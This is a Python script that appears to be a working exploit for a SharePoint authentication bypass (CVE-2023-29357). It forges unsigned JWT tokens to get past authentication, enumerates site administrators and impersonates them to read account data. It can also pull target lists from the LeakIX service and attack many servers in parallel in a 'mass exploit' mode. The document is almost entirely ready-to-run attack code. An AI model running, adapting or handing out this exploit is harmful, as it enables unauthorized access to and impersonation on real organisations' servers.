README.md
Rendering markdown...
import json
import time
import base64
import requests
import argparse
from rich.console import Console
from urllib.parse import urlparse
from typing import Union, List, Dict
from alive_progress import alive_bar
from leakpy.scraper import LeakixScraper
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning
console = Console()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class SharePoint:
client_id = "00000003-0000-0ff1-ce00-000000000000"
def __init__(self, url: str, verbose: bool):
self.url = url.rstrip('/')
self.hostname = urlparse(url).hostname
self.verbose = verbose
if self.verbose:
console.print("[+] URL:", self.url, style="bold green")
console.print("[+] Hostname:", self.hostname, style="bold green")
self.realm = self.get_realm()
self.aud = self.construct_aud_field()
def get_realm(self) -> str:
headers = {"Authorization": "Bearer "}
response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=3)
if response.status_code != 401:
console.print("[-] Unable to retrieve realm", style="bold red") if self.verbose else None
raise Exception("Unable to retrieve realm")
www_authenticate_header = response.headers.get('WWW-Authenticate', '')
if www_authenticate_header:
realm = None
for header in www_authenticate_header.split(','):
if 'realm="' in header:
try:
realm = header.split('realm="')[1].split('"')[0]
break
except IndexError:
continue
if self.verbose:
console.print("[+] Realm:", realm, style="bold green")
return realm
def construct_aud_field(self) -> str:
aud = f"{self.client_id}@{self.realm}"
if self.verbose:
console.print("[+] Aud Field:", aud, style="bold green")
return aud
def spoof_admin_users(self, admin_users: List[Dict[str, str]]) -> None:
current_time = int(time.time())
expiration_time = current_time + 3600
for user in admin_users:
payload = {
"aud": self.aud,
"iss": self.client_id,
"nbf": current_time,
"exp": expiration_time,
"ver": "hashedprooftoken",
"nameid": user.get("NameId", ""),
"nii": user.get("NameIdIssuer", ""),
"endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
"endpointurlLength": 1,
"isloopback": True,
"isuser": True
}
header = {"alg": "none"}
encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')
jwt_token = f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA"
headers = {
"Accept": "application/json",
"Authorization": f"Bearer {jwt_token}",
"X-PROOF_TOKEN": jwt_token,
}
endpoint_url = self.url.strip() + '/_api/web/currentuser'
response = requests.get(endpoint_url, headers=headers, verify=False, timeout=5)
if response.status_code == 200:
try:
parsed_response = json.loads(response.text)
console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
console.print(json.dumps(parsed_response, indent=4), style="bold green")
except json.JSONDecodeError:
console.print(f"[+] Spoofing succeeded for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'", style="bold green")
console.print(f"Received non-JSON response:\n{response.text}", style="bold yellow")
else:
console.print(f"[-] Spoofing failed for {user.get('Title', 'Unknown User')}: {user.get('Email', 'N/A')} at '/_api/web/currentuser'. Status code: {response.status_code}", style="bold red")
def create_jwt_token(self) -> str:
header = {"alg": "none"}
current_time = int(time.time())
expiration_time = current_time + 3600
payload = {
"aud": self.aud,
"iss": self.client_id,
"nbf": int(current_time),
"exp": int(expiration_time),
"ver": "hashedprooftoken",
"nameid": f'{self.client_id}@{self.realm}',
"endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
"endpointurlLength": 1,
"isloopback": True
}
encoded_header = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
encoded_payload = base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')
jwt_token = f"{encoded_header.decode()}.{encoded_payload.decode()}.AAA"
if self.verbose:
console.print("[+] JWT Token:", jwt_token, style="bold green")
return jwt_token
def authenticate_with_token(self, token: str) -> Union[bool, List[Dict[str, str]]]:
headers = {
"Accept": "application/json",
"Authorization": f"Bearer {token}",
"X-PROOF_TOKEN": token,
}
response = requests.get(self.url + '/_api/web/siteusers', headers=headers, verify=False, timeout=5)
if self.verbose:
console.print("[!] Attempting authentication for", self.url, "with token", style="bold yellow")
if response.status_code == 200:
try:
parsed_response = json.loads(response.text)
users = parsed_response.get('value', [])
admin_users = [user for user in users if user.get('IsSiteAdmin', False) is True]
admin_info_list = []
for user in admin_users:
admin_info = {
"Title": user.get('Title', 'N/A'),
"Email": user.get('Email', 'N/A'),
"NameId": user.get('UserId', {}).get('NameId', 'N/A'),
"NameIdIssuer": user.get('UserId', {}).get('NameIdIssuer', 'N/A')
}
admin_info_list.append(admin_info)
console.print(f"[+] Authenticated successfully for {self.url}\n", style="bold green")
if self.verbose and admin_users:
for admin_info in admin_info_list:
console.print(json.dumps(admin_info, indent=2), style="bold green")
console.print("=+"*20, style="bold green")
return admin_info_list if admin_info_list else True
except json.JSONDecodeError:
if self.verbose:
console.print(f"[+] Authenticated successfully for {self.url} but failed to parse the response text as JSON\nResponse Text: {response.text}", style="bold yellow")
return True
else:
if self.verbose:
console.print("[-] Authentication failed for", self.url, ". Status code:", response.status_code, style="bold red")
return False
def check_url(url: str, output_file: str = None, verbose: bool = False, mass_exploit: bool = False):
try:
sp = SharePoint(url, verbose=verbose)
jwt_token = sp.create_jwt_token()
authenticated = sp.authenticate_with_token(jwt_token)
if authenticated:
if output_file:
with open(output_file, 'a') as file:
file.write(f"{url}\n")
if not mass_exploit and isinstance(authenticated, list):
sp.spoof_admin_users(authenticated)
except Exception as e:
if verbose:
console.print("[!] Error in check_url:", str(e), style="bold red")
def fetch_from_leakix(fields="protocol, host, port", bulk=False, pages=2):
LEAKIX_API_KEY = "" # Configure this line with your LeakIX Pro API Key to use LeakPy
if LEAKIX_API_KEY == "":
console.print("[bold red]Please configure the Leakix API key.[/bold red]")
exit(1)
scraper = LeakixScraper(api_key=LEAKIX_API_KEY, verbose=True)
results = scraper.execute(
scope="leak",
query='+plugin:SharePointPlugin',
fields=fields,
pages=pages,
use_bulk=bulk,
)
url_dict = {}
for result in results:
protocol = result.get("protocol")
host = result.get("host")
port = result.get("port")
url = f"{protocol}://{host}:{port}"
url_dict[url] = None
return list(url_dict.keys())
def main():
parser = argparse.ArgumentParser(description='Mass tester for SharePoint CVE-2023–29357 Authentication Bypass.')
parser.add_argument('-u', '--url', type=str, help='The base url for the requests', required=False)
parser.add_argument('-l', '--list', type=str, help='File containing a list of base urls to scan', required=False)
parser.add_argument('-t', '--threads', type=int, help='Number of threads to use', default=10)
parser.add_argument('-o', '--output', type=str, help='File to output vulnerable urls', default='output.txt')
parser.add_argument('-v', '--verbose', action='store_true', help='Print verbose output', default=False)
parser.add_argument('--leakpy', action='store_true', help="Use Leakix to fetch URLs based on leaks")
parser.add_argument('--bulk', action='store_true', help="Use bulk_mode on LeakIX (Pro API Key only)")
parser.add_argument('--pages', type=int, default=2, help="Page results on LeakIX")
args = parser.parse_args()
urls = []
if args.leakpy:
urls = fetch_from_leakix(bulk=args.bulk, pages=args.pages)
elif args.list:
with open(args.list, 'r') as file:
urls = [line.strip() for line in file.readlines()]
elif args.url:
urls = [args.url]
if urls:
if (len(urls) > 1 and (args.leakpy or args.list)):
with ThreadPoolExecutor(max_workers=args.threads) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
futures = {executor.submit(check_url, url, args.output, args.verbose, mass_exploit=True): url for url in urls}
for future in as_completed(futures):
bar()
else:
check_url(urls[0], args.output, args.verbose, mass_exploit=False)
else:
console.print("[red]Please provide a url or a file with a list of base urls to scan.[/red]")
if __name__ == "__main__":
main()